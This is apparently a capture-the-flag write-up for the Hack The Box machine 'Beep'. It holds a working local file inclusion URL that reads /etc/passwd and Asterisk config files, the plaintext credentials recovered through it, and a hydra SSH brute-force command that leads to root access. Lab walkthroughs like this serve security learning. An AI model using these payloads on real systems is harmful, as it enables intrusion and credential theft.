# Beep
> # 10.10.10.7

The standard 1000 port of the normal nmap command won't be enough on this machine, you actually have to run nmap with the -p- argument and scan them all:
```bash
nmap -p- -sS -Pn -sC -sV -A -oN nmap/nmap.all 10.10.10.7
```

[Nmap](beepnmap.md)
>PORT      STATE SERVICE    VERSION
[22/tcp](portscan.md#22)    open  ssh        OpenSSH 4.3 (protocol 2.0)
[...]
[80/tcp](portscan.md#80)    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
[...]
[443/tcp](portscan.md#443)   open  ssl/https?
[...]
[10000/tcp](portscan.md#80) open  http       MiniServ 1.570 (Webmin httpd)
```txt
(The portscan reveal something like 20 open ports, i've cut them 
off in the nmap box and kept only the one who aren't "useless" 
or better say misleading, they were all mail service port.
If you're interested the full nmap scan is in the file linked
in the Nmap)
```

---
The port 80 and 443 are running the same webpage:
![[beep1.png]]

And the basic web enumeration return only [this file](https:/10.10.10.7//mailman/listinfo):
```txt
# Mailman CGI error!!!

The Mailman CGI wrapper encountered a fatal error. This entry is being stored in your syslog:

Group mismatch error. Mailman expected the CGI wrapper script to be
executed as one of the following groups:
[apache],
but the system's web server executed the CGI script as group: "asterisk".
Try tweaking the web server to run the script as one of these groups:
[apache],
or re-run configure providing the command line option:
'--with-cgi-gid=asterisk'.
```

Cool right? yeah but it's useless (at least for the moment, we'll see in the future, you never know)

---

Here i've started looking into the port 10000 falling into a rabbit hole, that part is in [this file](beep-rabbithole.md)

---
Asking to the internet some info about this "Elastix" software one of the first answer is this [exploit](https://www.exploit-db.com/exploits/37637), a nice LFI that never get's old.
Following those instruction and modifying and browsing to the URL:
```txt
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../../etc/passwd%00&module=Accounts&action
```
We get this result:
![[beep4.png]]



Now we have to find the interesting file.

Found [this forum](https://www.elastix.org/community/threads/how-to-change-the-default-asteriskuser-password.73040/) were they talk about Elastix update-password process 
![[beep5.png]]
And guess what we see looking at this [URL](https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/asterisk/cdr_mysql.conf%00&module=Accounts&action)
![[beep6.png]]


Here what we're interested into \[[original file](cdr_mysql)\]
```txt
[global] hostname = localhost
dbname=asteriskcdrdb 
password = jEhdIekWmdjE
user = asteriskuser 
userfield=1 ;
port=3306 ;
sock=/tmp/mysql.sock Sorry!
Attempt to access restricted file.
```
We have a username and a password, let's see if we can ssh in. 
Spoiler: no.

The solution to our problem is a big **bonk**, the first file that we've checked -and the one suggested in the LFI exploit - with this LFI was what we were looking for, using CRTL+U or view-source we can easily format it and understand why is a "big bonk":
![[beep9.png]]
```txt
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
```

We've already found this password - in the long way, ok, but we did. - we were using the wrong username.
admin@jEhdIekWmdjE
And we can access to the Elastix web-panel
![[beep12.png]]

But other than this there's nothing, analyzing the backup we can find some password but they're worthless.
We have some credentials and couple of users (root,admin,asteriskuser) and passwords, using hydra (or manually cause they're not that much come on, just start with the more obvious, root) try to bruteforce your way in with ssh:
```bash
#paste the users in the file users.txt and the passwords in
#pass.txt
hydra -L users.txt -P pass.txt ssh://10.10.10.7
```
![[beep11.png]]
with root@jEhdIekWmdjE
![[beep10.png]]

We're be able to ssh in as root.

#machine #hydra #LFI